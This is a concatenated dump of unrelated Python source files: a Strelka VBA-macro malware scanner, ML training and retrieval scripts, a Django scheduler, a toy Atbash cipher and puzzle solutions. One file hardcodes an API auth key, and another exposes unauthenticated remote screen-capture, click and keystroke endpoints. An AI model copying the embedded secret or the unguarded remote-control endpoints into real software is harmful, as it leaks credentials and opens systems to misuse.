List[str]:\n \"\"\"Get a list of \"config\" keys used by the instance and its descendants.\n\n Returns:\n A list of \"config\" keys used by the instance and its descendants.\n \"\"\"\n\n @abc.abstractmethod\n def get_input_data_keys(self) -> List[str]:\n \"\"\"Get a list of \"input\" keys used by the instance and its descendants.\n\n Returns:\n A list of \"input\" keys used by the instance and its descendants.\n \"\"\"\n\n @abc.abstractmethod\n def get_values_keys(self) -> List[str]:\n \"\"\"Get a list of \"values\" keys used by the instance and its descendants.\n\n Returns:\n A list of \"values\" keys used by the instance and its descendants.\n \"\"\"\n\n @staticmethod\n def _get_keys_from_elements(\n children: Sequence,\n inspect_keys_function: Callable,\n ) -> List[str]:\n return list(\n set(\n itertools.chain.from_iterable(\n [inspect_keys_function(child) for child in children],\n )\n )\n )\n","sub_path":"src/skrough/typing.py","file_name":"typing.py","file_ext":"py","file_size_in_byte":4517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"216685440","text":"from oletools import olevba3\n\nfrom strelka import strelka\n\n\nclass ScanVba(strelka.Scanner):\n \"\"\"Extracts and analyzes VBA from document files.\n\n Options:\n analyze_macros: Boolean that determines if macros should be analyzed.\n Defaults to True.\n \"\"\"\n def scan(self, data, file, options, expire_at):\n analyze_macros = options.get('analyze_macros', True)\n\n self.event['total'] = {'files': 0, 'extracted': 0}\n\n try:\n vba = olevba3.VBA_Parser(filename=file.name, data=data)\n if vba.detect_vba_macros():\n extract_macros = list(vba.extract_macros())\n self.event['total']['files'] = len(extract_macros)\n for (filename, stream_path, vba_filename, vba_code) in extract_macros:\n extract_file = strelka.File(\n name=f'{vba_filename}',\n source=self.name,\n )\n\n for c in strelka.chunk_string(vba_code):\n self.upload_to_coordinator(\n extract_file.pointer,\n c,\n expire_at,\n )\n\n self.files.append(extract_file)\n self.event['total']['extracted'] += 1\n\n if analyze_macros:\n self.event.setdefault('auto_exec', [])\n self.event.setdefault('base64', [])\n self.event.setdefault('dridex', [])\n self.event.setdefault('hex', [])\n self.event.setdefault('ioc', [])\n self.event.setdefault('suspicious', [])\n macros = vba.analyze_macros()\n for (type, keyword, description) in macros:\n if type == 'AutoExec':\n self.event['auto_exec'].append(keyword)\n elif type == 'Base64 String':\n self.event['base64'].append(keyword)\n elif type == 'Dridex String':\n self.event['dridex'].append(keyword)\n elif type == 'Hex String':\n self.event['hex'].append(keyword)\n elif type == 'IOC':\n self.event['ioc'].append(keyword)\n elif type == 'Suspicious':\n self.event['suspicious'].append(keyword)\n\n except olevba3.FileOpenError:\n self.flags.append('file_open_error')\n finally:\n vba.close()\n","sub_path":"src/python/strelka/scanners/scan_vba.py","file_name":"scan_vba.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"632172527","text":"# all units on International System of Units\n# The position of each element (corner of concrete section and center of steel bars) have to be the same\nimport nFOC as nf\nimport numpy as np\n\n# Geometry\n## Concrete\nx_c = np.array([0,0.20,0.20,0,0])\ny_c = np.array([0,0,0.32,0.32,0]) \n\n### you can put your referential in any point. If not specified, the code will center in the center of mass\nreinforced_concrete_section = nf.Section(x_c,y_c)\nx_c=reinforced_concrete_section.x_c\ny_c=reinforced_concrete_section.y_c\n\n## Steel\nsteel_bar_diameter = 10e-3\nsteel_bar_areas = ( np.pi * (steel_bar_diameter**2) / 4 ) * np.array([1, 1, 1, 1, 1, 1]) \nx_s = np.array([0.05, 0.05, 0.05, 0.15, 0.15, 0.15])\ny_s = np.array([0.05, 0.16, 0.27, 0.05, 0.16, 0.27])\n\nreinforced_concrete_section.define_reinforcing_bars(x_s, y_s, steel_bar_areas)\nrebar=reinforced_concrete_section.rebar\n\n'''\nThis is a matrix where the first column is the x-position \nand second column is the y-position of each steel bar.\nThe third column is the area of the respective steel bar.\n'''\n# Material\n## Concrete\nf_ck = 30\n\n## Steel\nsteel = 50\n\n# Vizualise the concrete section and reinforcing bar\nreinforced_concrete_section.showSection()\n\n# Sample - uniform compression\n\n(epsilon0 , kx, ky) = (2 , 0 , 0)\n\nNs = nf.Ns(rebar , steel , epsilon0 , kx , ky)\nMsx = nf.Msx(rebar , steel , epsilon0 , kx , ky)\nMsy = nf.Msy(rebar , steel , epsilon0 , kx , ky)\n\nNc = nf.Nc( x_c , y_c , f_ck , epsilon0 , kx, ky )\nMcx = nf.Mcx( x_c , y_c , f_ck , epsilon0 , kx, ky )\nMcy = nf.Mcy( x_c , y_c , f_ck , epsilon0 , kx, ky )\nprint('----')\nprint(\"%.4f\" % (Ns/1e6)) # = 0.1979 MN\nprint(\"%.4f\" % (Msx/1e6)) # ~ 0\nprint(\"%.4f\" % (Msy/1e6)) # ~ 0\nprint(\"%.4f\" % (Nc/1e6)) # = 1.1657 MN.m\nprint(\"%.4f\" % (Mcx/1e6)) # ~ 0\nprint(\"%.4f\" % (Mcy/1e6)) # ~ 0\n\n# Sample - uniform traction\n(epsilon0 , kx, ky) = (-10 , 0 , 0)\n\nNs = nf.Ns(rebar , steel , epsilon0 , kx , ky)\nMsx = nf.Msx(rebar , steel , epsilon0 , kx , ky)\nMsy = nf.Msy(rebar , steel , epsilon0 , kx , ky)\n\nNc = nf.Nc( x_c , y_c , f_ck , epsilon0 , kx, ky )\nMcx = nf.Mcx( x_c , y_c , f_ck , epsilon0 , kx, ky )\nMcy = nf.Mcy( x_c , y_c , f_ck , epsilon0 , kx, ky )\nprint('----')\nprint(\"%.4f\" % (Ns/1e6)) # = -0.2049 MN\nprint(\"%.4f\" % (Msx/1e6)) # ~ 0\nprint(\"%.4f\" % (Msy/1e6)) # ~ 0\nprint(\"%.4f\" % (Nc/1e6)) # ~ 0\nprint(\"%.4f\" % (Mcx/1e6)) # ~ 0\nprint(\"%.4f\" % (Mcy/1e6)) # ~ 0\n\n# Sample 2 - ELU being transpassed\n(epsilon0 , kx, ky) = (2 , -6.25 , 0)\n\nNs = nf.Ns(rebar , steel , epsilon0 , kx , ky)\nMsx = nf.Msx(rebar , steel , epsilon0 , kx , ky)\nMsy = nf.Msy(rebar , steel , epsilon0 , kx , ky)\n\nNc = nf.Nc( x_c , y_c , f_ck , epsilon0 , kx, ky )\nMcx = nf.Mcx( x_c , y_c , f_ck , epsilon0 , kx, ky )\nMcy = nf.Mcy( x_c , y_c , f_ck , epsilon0 , kx, ky )\nprint('----')\nprint(\"%.4f\" % (Ns/1e6)) # = 0.1776 MN\nprint(\"%.4f\" % (Msx/1e6)) # = -0.0028 MN.m\nprint(\"%.4f\" % (Msy/1e6)) # ~ 0\nprint(\"%.4f\" % (Nc/1e6)) # = 1.1171 MN\nprint(\"%.4f\" % (Mcx/1e6)) # = -0.0058 MN.m\nprint(\"%.4f\" % (Mcy/1e6)) # ~ 0\n\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"303549570","text":"# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# coding=UTF-8\n\nfrom functools import partial\nimport argparse\nimport os\nimport sys\nimport random\nimport time\n\nimport numpy as np\nimport hnswlib\nimport paddle\nimport paddle.nn.functional as F\nimport paddlenlp as ppnlp\nfrom paddlenlp.data import Stack, Tuple, Pad\nfrom paddlenlp.datasets import load_dataset, MapDataset, load_dataset\nfrom paddlenlp.utils.log import logger\n\nfrom base_model import SemanticIndexBase\nfrom data import convert_example, create_dataloader\nfrom data import gen_id2corpus, gen_text_file\nfrom ann_util import build_index\n\n# yapf: disable\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--corpus_file\", type=str, required=True, help=\"The full path of input file\")\nparser.add_argument(\"--similar_text_pair_file\", type=str, required=True, help=\"The full path of similar text pair file\")\nparser.add_argument(\"--recall_result_dir\", type=str, default='recall_result', help=\"The full path of recall result file to save\")\nparser.add_argument(\"--recall_result_file\", type=str, default='recall_result_file', help=\"The file name of recall result\")\nparser.add_argument(\"--params_path\", type=str, required=True, help=\"The path to model parameters to be loaded.\")\nparser.add_argument(\"--max_seq_length\", default=64, type=int, help=\"The maximum total input sequence length after tokenization. \"\n \"Sequences longer than this will be truncated, sequences shorter will be padded.\")\nparser.add_argument(\"--batch_size\", default=32, type=int, help=\"Batch size per GPU/CPU for training.\")\nparser.add_argument(\"--output_emb_size\", default=None, type=int, help=\"output_embedding_size\")\nparser.add_argument(\"--recall_num\", default=10, type=int, help=\"Recall number for each query from Ann index.\")\n\nparser.add_argument(\"--hnsw_m\", default=100, type=int, help=\"Recall number for each query from Ann index.\")\nparser.add_argument(\"--hnsw_ef\", default=100, type=int, help=\"Recall number for each query from Ann index.\")\nparser.add_argument(\"--hnsw_max_elements\", default=1000000, type=int, help=\"Recall number for each query from Ann index.\")\n\nparser.add_argument('--device', choices=['cpu', 'gpu'], default=\"gpu\", help=\"Select which device to train model, defaults to gpu.\")\nargs = parser.parse_args()\n# yapf: enable\n\nif __name__ == \"__main__\":\n paddle.set_device(args.device)\n rank = paddle.distributed.get_rank()\n if paddle.distributed.get_world_size() > 1:\n paddle.distributed.init_parallel_env()\n\n tokenizer = ppnlp.transformers.ErnieTokenizer.from_pretrained('ernie-1.0')\n\n trans_func = partial(\n convert_example,\n tokenizer=tokenizer,\n max_seq_length=args.max_seq_length)\n\n batchify_fn = lambda samples, fn=Tuple(\n Pad(axis=0, pad_val=tokenizer.pad_token_id), # text_input\n Pad(axis=0, pad_val=tokenizer.pad_token_type_id), # text_segment\n ): [data for data in fn(samples)]\n\n pretrained_model = ppnlp.transformers.ErnieModel.from_pretrained(\n \"ernie-1.0\")\n\n model = SemanticIndexBase(\n pretrained_model, output_emb_size=args.output_emb_size)\n model = paddle.DataParallel(model)\n\n # Load pretrained semantic model\n if args.params_path and os.path.isfile(args.params_path):\n state_dict = paddle.load(args.params_path)\n model.set_dict(state_dict)\n logger.info(\"Loaded parameters from %s\" % args.params_path)\n else:\n raise ValueError(\n \"Please set --params_path with correct pretrained model file\")\n\n id2corpus = gen_id2corpus(args.corpus_file)\n\n # conver_example function's input must be dict\n corpus_list = [{idx: text} for idx, text in id2corpus.items()]\n corpus_ds = MapDataset(corpus_list)\n\n corpus_data_loader = create_dataloader(\n corpus_ds,\n mode='predict',\n batch_size=args.batch_size,\n batchify_fn=batchify_fn,\n trans_fn=trans_func)\n\n # Need better way to get inner model of DataParallel\n inner_model = model._layers\n\n final_index = build_index(args, corpus_data_loader, inner_model)\n\n text_list, text2similar_text = gen_text_file(args.similar_text_pair_file)\n\n query_ds = MapDataset(text_list)\n\n query_data_loader = create_dataloader(\n query_ds,\n mode='predict',\n batch_size=args.batch_size,\n batchify_fn=batchify_fn,\n trans_fn=trans_func)\n\n query_embedding = inner_model.get_semantic_embedding(query_data_loader)\n\n if not os.path.exists(args.recall_result_dir):\n os.mkdir(args.recall_result_dir)\n\n recall_result_file = os.path.join(args.recall_result_dir,\n args.recall_result_file)\n with open(recall_result_file, 'w', encoding='utf-8') as f:\n for batch_index, batch_query_embedding in enumerate(query_embedding):\n recalled_idx, cosine_sims = final_index.knn_query(\n batch_query_embedding.numpy(), args.recall_num)\n\n batch_size = len(cosine_sims)\n\n for row_index in range(batch_size):\n text_index = args.batch_size * batch_index + row_index\n for idx, doc_idx in enumerate(recalled_idx[row_index]):\n f.write(\"{}\\t{}\\t{}\\n\".format(text_list[text_index][\n \"text\"], id2corpus[doc_idx], 1.0 - cosine_sims[\n row_index][idx]))\n","sub_path":"examples/semantic_indexing/recall.py","file_name":"recall.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"134479131","text":"import requests\nimport hashlib,time,re\nimport constant.device as Device\n\ndef getBrokerForDevice():\n url = 'http://xcloud.dev.xcharger.net/Addr/getBrokerForDevice/v1.0'\n\n #签名 = MD5(sourceId+timestamp+nonce+authKey)\n timestamp = time.strftime('%Y%m%d%H%M%S', time.localtime())\n src = 'C601170914SZYHQZIG' + timestamp + \"1\" + 'eJm99EfmYXuTyG3F'\n m2 = hashlib.md5()\n m2.update(src.encode(\"utf-8\"))\n signature = m2.hexdigest()\n\n json_body = {\n 'sourceId':'C601170914SZYHQZIG',\n 'timestamp':timestamp,\n 'nonce':'1',\n 'signature':signature,\n 'secure':False\n }\n res = requests.post(url,json=json_body,verify=False)\n result = res.json()['result']\n pattern =\"[\\d{1,3}.]+\\d{1,3}\"\n hostname = re.findall(pattern,result)[0]\n return hostname\n\nif __name__ == '__main__':\n # timestamp = time.strftime('%Y%m%d%H%M%S',time.localtime())\n # str = Device.SN_C2_01 + timestamp + '2' + Device.auth_key_C2_01\n # h1 = hashlib.md5()\n # h1.update(str.encode(encoding='utf-8'))\n # print('之前',str)\n # print('之后',h1.hexdigest())\n res = getBrokerForDevice()\n print(res)\n","sub_path":"Activemq/getbrokerfordevice.py","file_name":"getbrokerfordevice.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"266487248","text":"'''\nSimple encrypt/decrypt program.\nWorks using the Atbash cipher, in which every\nletter is reversed. E.g, A becomes Z, B becomes Y etc.\nThe easy thing about this is that to decrypt the output,\nyou just have to encrypt it again.\n'''\n\n#List of alphabet characters.\nalphabet = list(\"abcdefghijklmnopqrstuvwxyz\")\n\n#The atbash encrypt/decrypt function.\ndef encrypt_decrypt(plaintext):\n\t#offset is how many from the end the new character is.\n\t#e.g, if letter = a. new letter = z. offset = 1. \n\toffset = 0\n\t#result is the empty string we're going to be appending the new letters to.\n\tresult = \"\"\n\n\t#iterate through the whole plaintext word.\n\tfor i in range(0, len(plaintext)):\n\t\t#Compare each letter against the alphabet list.\n\t\tfor letter in alphabet:\n\t\t\t#if the letter at i in plaintext matches the alphabet letter:\n\t\t\tif plaintext[i] == letter:\n\t\t\t\t#offset = the alphabet length - the index in alphabet where the letter at i is.\n\t\t\t\toffset = (len(alphabet) - 1) - alphabet.index(plaintext[i])\n\t\t\t\t#Append the letter of the alphabet that is at this offset.\n\t\t\t\tresult += alphabet[offset]\n\t\t#If we find a space\n\t\tif plaintext[i] == \" \":\n\t\t\t#append space to result\n\t\t\tresult += \" \"\n\n\treturn result\n\n\ndef main():\n\t#Always get input, unless user hits enter with nothing.\n\twhile True:\n\t\tprint(\"Enter a string to 'encrypt' or 'decrypt' using the atbash cipher: \")\n\t\tuser_input = str(input(\"> \"))\n\t\tif user_input.isdigit():\n\t\t\tprint(\"Please enter a string!\")\n\t\telif user_input == \"\":\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"# \" + encrypt_decrypt(user_input.lower()))\n\t\t\tprint(\"-----------------------------------------------------------------\")\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"04_encryption_decryption/encrypt_decrypt.py","file_name":"encrypt_decrypt.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"17407111","text":"\"\"\"Command to run cron-based schedules.\"\"\"\nimport datetime\nimport logging\nimport time\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\nfrom django.utils.timezone import now\nimport pytz\n\nfrom core.models import OffScheduleConstraint, OnScheduleConstraint, RealPerson, Unit\nfrom x10.interface import FirecrackerException\nfrom x10.lock import CacheLockException\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n \"\"\"Command to run crontab schedules.\"\"\"\n\n help = 'Runs the crontab schedule events for units.'\n\n def add_arguments(self, parser):\n \"\"\"Add arguments to the command.\"\"\"\n parser.add_argument(\n '-i', '--interval',\n help='How often the schedules should be checked, in seconds',\n type=int,\n default=5 * 60)\n\n def handle(self, *args, **options):\n \"\"\"Runtime for command.\"\"\"\n # set up logging levels\n verbosity = options.get('verbosity')\n if verbosity == 0:\n logger.setLevel(logging.WARN)\n elif verbosity == 1:\n logger.setLevel(logging.INFO)\n elif verbosity > 1:\n logger.setLevel(logging.DEBUG)\n\n # get the interval and create a time delta\n interval = options.get('interval')\n self.delta = datetime.timedelta(seconds=interval)\n\n # used only for logging times\n self.tz = pytz.timezone(settings.TIME_ZONE)\n\n while True:\n current_time = now()\n logger.debug(f'starting check at {current_time.astimezone(self.tz)}')\n\n # if a person is not home, exclude the schedules that require someone to be home\n qs_filter = {}\n if not RealPerson.is_home():\n qs_filter['if_home'] = True\n\n # get all of the on schedules\n on_constraints = OnScheduleConstraint.objects.exclude(**qs_filter)\n off_constraints = OffScheduleConstraint.objects.exclude(**qs_filter)\n\n self.run_actions(on_constraints, current_time, Unit.ON_ACTION)\n self.run_actions(off_constraints, current_time, Unit.OFF_ACTION)\n\n # get the duration of the loop\n finish_time = now()\n duration = finish_time - current_time\n logger.debug(f'loop duration was {duration}')\n\n # schedule the next loop to run to stay within the interval time\n wait_sec = interval - duration.total_seconds()\n if duration.total_seconds() > interval:\n logger.warning(f'execution time exceeds interval, skipping next loop')\n wait_sec += interval\n\n # sleep until the next loop\n logger.debug(f'sleeping {wait_sec} seconds...')\n time.sleep(wait_sec)\n\n def run_actions(self, constraints, current_time: datetime, action: str):\n \"\"\"Run actions for a set of schedule constraints.\n\n :param constraints: the queryset of schedule constraints to loop through\n :param current_time: the current time to calculate the next event time\n :param action: the command to be sent\n \"\"\"\n for c in constraints:\n # get the next event time for the schedule\n event_time = c.schedule.next_time(current_time)\n logger.debug(f'{c.schedule} next event time is at {event_time.astimezone(self.tz)}')\n\n # get the next time the loop will run\n next_run = current_time + self.delta\n logger.debug(f'next run is at {next_run.astimezone(self.tz)}')\n\n if next_run > event_time:\n # the next time the loop will run exceeds the next scheduled time, run now\n logger.info(f'turning {c.unit} {action}')\n try:\n c.unit.send_signal(action)\n except (CacheLockException, FirecrackerException) as e:\n logger.exception(e)\n","sub_path":"src/core/management/commands/cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"481526875","text":"# tr_bimini.py william k. johnson 2016\n\nimport os\nimport sys\nfrom StringIO import StringIO\nimport logging\nfrom flask import Flask , request , send_file , render_template , url_for\n\n#cci\nimport tr_trinity\n\nfrom application import app\n\nlog_format = '%(asctime)s.%(msecs)s:%(name)s:%(thread)d:%(levelname)s:%(process)d:%(message)s'\n\n# logger\n_logger = logging.getLogger( \"tr_bimini\" )\n_logger.setLevel( logging.DEBUG )\nfh = logging.FileHandler( 'tr_bimini.log' + '-debug.log', mode = 'a' )\nfh.setLevel( logging.DEBUG )\nformatter = logging.Formatter( log_format )\nfh.setFormatter( formatter )\n_logger.addHandler( fh )\n\n\n\n\n# ------------------------------------------------------------------------------\n@app.route( \"/bimini\" )\ndef cci_trinity():\n\n\t\t\tout = 'cci_trinity capture screen...'\n\t\t\tio = StringIO()\n\t\t\ttry :\n\n\t\t\t\tb_ret , out = tr_trinity.capture_screen( _logger )\n\t\t\t\tif not b_ret :\n\t\t\t\t\t_logger.error( out )\n\t\t\t\telse :\n\t\t\t\t\tio.write( out )\n\t\t\t\t\tio.seek( 0 )\n\n\n\t\t\texcept Exception as e :\n\t\t\t\tout = 'error in cci_trinity.....' + e.message\n\t\t\t\t_logger.error( out )\n\t\t\t\treturn\n\n\t\t\treturn send_file( io , mimetype='image/png' )\n\napp.add_url_rule( '/bimini' ,\n\t\t\t\t 'cci_trinity' ,\n\t\t\t\t view_func=cci_trinity ,\n\t\t\t\t methods=['GET'] )\n\n\n\n\n# ------------------------------------------------------------------------\n@app.route('/bimini/click')\ndef click() :\n\t\t\t\"\"\"\n\n\t\t\t:return:\n\t\t\t\"\"\"\n\n\t\t\treturn tr_trinity.capture_clicks( log = _logger ,\n\t\t\t\t\t\t\t\t\t\t request = request )\n\napp.add_url_rule( '/bimini/click' ,\n\t\t\t\t 'click' ,\n\t\t\t\t view_func=click ,\n\t\t\t\t methods=['GET'] )\n\n\n\n\n# ------------------------------------------------------------------------\n@app.route('/bimini/key')\ndef key() :\n\t\t\t\"\"\"\n\n\t\t\t:return:\n\t\t\t\"\"\"\n\n\t\t\treturn tr_trinity.capture_keys( log = _logger ,\n\t\t\t\t\t\t\t\t\t\t request = request )\n\napp.add_url_rule( '/bimini/key' ,\n\t\t\t\t 'key' ,\n\t\t\t\t view_func=key ,\n\t\t\t\t methods=['GET'] )\n\n\n","sub_path":"cci-mobile/trinity/streams/tr_bimini.py","file_name":"tr_bimini.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"251624471","text":"#!/mnt/d/software/python/python.exe -B\n\ninput_file = open('day_17_input.txt', 'r')\ninput_data = [list(line.strip()) for line in input_file]\n\ndef vec_add(v1, v2):\n return tuple(x + y for x, y in zip(v1, v2))\n\ndef neighbors_count(cube, board, offset):\n return sum([vec_add(cube, cube_off) in board for cube_off in offset])\n\ndef simulate(board, cycles, get_boundries, offset):\n for i in range(cycles):\n new_board = board.copy()\n for cube in get_boundries(board):\n neighbors = neighbors_count(cube, board, offset)\n if cube in board and neighbors not in (2, 3):\n new_board.remove(cube)\n elif cube not in board and neighbors == 3:\n new_board.add(cube)\n board = new_board\n\n return board\n\nboard_3d = set()\nboard_4d = set()\nfor y in range(len(input_data)):\n for x in range(len(input_data[y])):\n if input_data[y][x] == '#':\n board_3d.add((x, y, 0))\n board_4d.add((x, y, 0, 0))\n\noffset_3d = []\noffset_4d = []\nfor x in (-1, 0, 1):\n for y in (-1, 0, 1):\n for z in (-1, 0, 1):\n for w in (-1, 0, 1):\n offset_4d.append((x, y, z, w))\n offset_3d.append((x, y, z))\noffset_3d.remove((0, 0, 0))\noffset_4d.remove((0, 0, 0, 0))\n\n# Part One\n\ndef get_boundries_3d(board_3d):\n mins = [min(board_3d, key=lambda x: x[i])[i] - 1 for i in range(3)]\n maxs = [max(board_3d, key=lambda x: x[i])[i] + 1 for i in range(3)]\n for x in range(mins[0], maxs[0] + 1):\n for y in range(mins[1], maxs[1] + 1):\n for z in range(mins[2], maxs[2] + 1):\n yield (x, y, z)\n\nboard_3d = simulate(board_3d, 6, get_boundries_3d, offset_3d)\nactive = len(board_3d)\nprint(active)\n\n# Part Two\n\ndef get_boundries_4d(board_4d):\n mins = [min(board_4d, key=lambda x: x[i])[i] - 1 for i in range(4)]\n maxs = [max(board_4d, key=lambda x: x[i])[i] + 1 for i in range(4)]\n for x in range(mins[0], maxs[0] + 1):\n for y in range(mins[1], maxs[1] + 1):\n for z in range(mins[2], maxs[2] + 1):\n for w in range(mins[3], maxs[3] + 1):\n yield (x, y, z, w)\n\nboard_4d = simulate(board_4d, 6, get_boundries_4d, offset_4d)\nactive = len(board_4d)\nprint(active)\n","sub_path":"2020/day_17/day_17.py","file_name":"day_17.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"463444575","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nfrom sqlalchemy import *\nfrom sqlalchemy.orm import *\n\nengine = create_engine('sqlite:///./data/databases.db', echo=True)\n\nmetadata = MetaData(engine)\n\nenglish_words = Table('english_words', metadata,\n Column('id', Integer, primary_key=True, autoincrement=True),\n Column('word', String(50)),\n Column('term_frequency', Integer),\n Column('images', Text),\n Column('ext', Text))\n\nenglish_words.create()\n\n","sub_path":"recite_english_words/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"439740523","text":"import os\nimport os.path\nfrom PIL import Image\nfrom PIL import ImageFilter\nimport numpy as np\nimport keras\nimport pandas as pd\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D, AveragePooling2D\nfrom keras.models import Sequential\nfrom keras.layers import Input\nfrom keras.applications.inception_resnet_v2 import InceptionResNetV2\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras import applications\nfrom keras.models import Sequential,Model,load_model\nfrom keras.applications.vgg16 import VGG16\nimport math\nimport sys\n\ntrain11 = sys.argv[1]\nmode = sys.argv[2]\n\ntarget_names = ['daisy','dandelion','rose','sunflower','tulips']\nimage_height = 150\nimage_width = 150\nbatch_size = 32\ntrain_datagen = ImageDataGenerator(\n rescale=1./255.,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True,\n validation_split = 0.2)\n\ntrain_generator = train_datagen.flow_from_directory(\n train11,\n target_size=(image_height, image_width),\n color_mode=\"rgb\",\n batch_size=batch_size,\n class_mode='categorical',\n subset = 'training',\n shuffle=False)\nvalid_generator = train_datagen.flow_from_directory(\n train11,\n target_size=(image_height, image_width),\n color_mode=\"rgb\",\n batch_size=batch_size,\n subset = 'validation',\n class_mode='categorical',\n shuffle=False)\n# Function to get labels from generators to separate them\ndef get_labels(gen):\n labels = []\n sample_no = len(gen.filenames)\n call_no = int(math.ceil(sample_no / batch_size))\n for i in range(call_no):\n labels.extend(np.array(gen[i][1]))\n \n return np.array(labels)\n\nbase_model = VGG16(weights='imagenet', include_top=False,input_shape = (150,150,3))\n\n#train_data = np.array(base_model.predict_generator(train_generator))\n#train_labels = get_labels(train_generator)\nvalid_data = np.array(base_model.predict_generator(valid_generator))\nvalid_labels = get_labels(valid_generator)\n\nmodel = load_model(mode)\n\n\ndef test():\n\tmm = model.evaluate(valid_data,valid_labels)\n\tprint('Accuracy:', round(mm[1],2))\n\tprint('Test Error:', round(1-mm[1],2))\n\ntest()\n","sub_path":"CNN_Kaggle_Various_Datasets/flowers_test.py","file_name":"flowers_test.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"402088771","text":"import torch.utils.data as data\r\nimport os, cv2\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom glob import glob\r\nimport torch\r\n\r\nclass TN_Dataset(data.Dataset):\r\n def __init__(self, img_path, mask_path, csv_path, mode='train'):\r\n self.img_path = img_path\r\n self.mask_path = mask_path\r\n self.csv_path = csv_path\r\n self.mode = mode\r\n df = self.add_weight(self.csv_path, mode=False)\r\n self.ID_list, self.CATE_list = self.get_images_name(df)\r\n\r\n print(\"Found %d images\" % len(self.ID_list), self.mode)\r\n\r\n def __len__(self): return len(self.ID_list)\r\n\r\n def __getitem__(self, index):\r\n id = self.ID_list[index]\r\n cate = self.CATE_list[index]\r\n if cate == 1:\r\n CATE = np.array(1)\r\n else:\r\n CATE = np.array(0)\r\n\r\n CATE = torch.from_numpy(CATE).type(torch.LongTensor)\r\n\r\n image = cv2.imread(os.path.join(self.img_path, id), cv2.IMREAD_GRAYSCALE)\r\n mask = cv2.imread(os.path.join(self.mask_path, id), cv2.IMREAD_GRAYSCALE)\r\n image_size = image.shape[:2]\r\n image = cv2.resize(image, (256, 256), interpolation=cv2.INTER_AREA)\r\n mask = cv2.resize(mask, (256, 256), interpolation=cv2.INTER_NEAREST)\r\n image =image/255\r\n mask = mask/255\r\n image = torch.from_numpy(image).type(torch.FloatTensor)\r\n mask = torch.from_numpy(mask).type(torch.FloatTensor)\r\n image = torch.unsqueeze(image, axis=0)\r\n mask = torch.unsqueeze(mask, axis=0)\r\n output_dict = dict(img=image, mask=mask, ID=id, CATE=CATE, size=image_size)\r\n\r\n return output_dict\r\n\r\n def add_weight(self, csv_path, mode=False):\r\n df = pd.read_csv(csv_path)\r\n weights = []\r\n if mode is False:\r\n for i in range(len(df)):\r\n id = df['ID'][i]\r\n weight = 1\r\n weights.append(weight)\r\n weights_df = pd.DataFrame({'weight': weights})\r\n df = pd.concat([df, weights_df], axis=1)\r\n return df\r\n\r\n\r\n def get_images_name(self, df):\r\n ID_list = []\r\n CATE_list = []\r\n if self.mode == 'train':\r\n for i in range(3280):\r\n weight = df['weight'][i]\r\n for j in range(weight):\r\n if j == 0:\r\n ID_list.append(df['ID'][i])\r\n CATE_list.append(df['CATE'][i])\r\n else:\r\n ID_list.append('aug_' + df['ID'][i])\r\n CATE_list.append(df['CATE'][i])\r\n\r\n elif self.mode == 'val':\r\n for i in range(len(df) - 3280):\r\n ID_list.append(df['ID'][i + 3280])\r\n CATE_list.append(df['CATE'][i + 3280])\r\n\r\n return ID_list, CATE_list\r\n\r\nclass TN_test_dataset(data.Dataset):\r\n def __init__(self, img_path):\r\n self.img_path = img_path\r\n self.id_list = self.get_id_list()\r\n\r\n def __len__(self): return len(self.id_list)\r\n\r\n def __getitem__(self, index):\r\n file_name = self.id_list[index]\r\n file_path = os.path.join(self.img_path, file_name)\r\n\r\n image = cv2.imread(file_path, cv2.IMREAD_GRAYSCALE)\r\n image_size = image.shape[:2]\r\n image = cv2.resize(image, (256, 256), interpolation=cv2.INTER_AREA)\r\n image = image / 255\r\n image = torch.from_numpy(image).type(torch.FloatTensor)\r\n image = torch.unsqueeze(image, axis=0)\r\n\r\n output_dict = dict(img=image, ID=file_name, size=image_size)\r\n return output_dict\r\n\r\n def get_id_list(self):\r\n id_list = os.listdir(self.img_path)\r\n return 